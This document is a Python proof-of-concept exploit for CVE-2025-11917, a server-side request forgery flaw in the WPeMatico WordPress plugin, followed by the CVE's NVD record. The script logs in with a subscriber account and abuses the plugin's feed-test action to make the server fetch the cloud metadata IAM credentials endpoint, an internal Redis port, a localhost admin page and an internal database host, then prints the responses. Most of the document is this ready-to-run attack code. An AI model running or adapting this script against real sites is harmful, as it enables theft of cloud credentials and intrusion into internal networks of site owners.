CVE-2025-11917

#!/usr/bin/env python3 """ CVE-2025-11917 - WPeMatico SSRF PoC Author: Security Researcher Note: For authorized testing only """ import requests import sys TARGET_URL = "http://target-wordpress-site.com" LOGIN_URL = f"{TARGET_URL}/wp-login.php" SSRF_URL = f"{TARGET_URL}/wp-admin/admin-ajax.php" def login(session, username, password): """Login to WordPress with subscriber account""" data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(LOGIN_URL, data=data) return 'wordpress_logged_in' in session.cookies.get_dict() def exploit_ssrf(session, target_host="http://169.254.169.254/latest/meta-data/", internal_ip="10.0.0.1"): """Exploit SSRF via wpematico_test_feed() function""" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded' } # Payload for SSRF - test internal metadata service data = { 'action': 'wpematico_test_feed', 'feed_url': target_host, # SSRF payload 'campaign_id': '0' } try: response = session.post(SSRF_URL, data=data, headers=headers, timeout=10) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.text)}") if response.status_code == 200: print(f"[+] SSRF Successful - Response:") print(response.text[:500]) return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print("CVE-2025-11917 WPeMatico SSRF Exploit") print("=" * 50) session = requests.Session() # Login with subscriber account if not login(session, "subscriber_user", "password"): print("[-] Login failed") sys.exit(1) print("[+] Logged in successfully") # Test SSRF against various targets targets = [ "http://169.254.169.254/latest/meta-data/iam/security-credentials/", "http://10.0.0.1:6379/", "http://localhost:8080/admin", "http://internal-db.local:3306/" ] for target in targets: print(f"\n[*] Testing target: {target}") exploit_ssrf(session, target_host=target)

{"cve": {"id": "CVE-2025-11917", "sourceIdentifier": "[email protected]", "published": "2025-11-05T07:15:32.073", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WPeMatico RSS Feed Fetcher plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.8.11 via the wpematico_test_feed() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/etruel/wpematico/commit/7a281dcfc0868490d62caee54f3b743708fed7cf", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpematico/tags/2.8.11/app/campaign_edit.php#L24", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpematico/tags/2.8.11/app/wpematico_functions.php#L1249", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpematico/tags/2.8.11/app/wpematico_functions.php#L1260", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5a1c6377-c2a7-4344-86bd-d2797db19469?source=cve", "source": "[email protected]"}]}}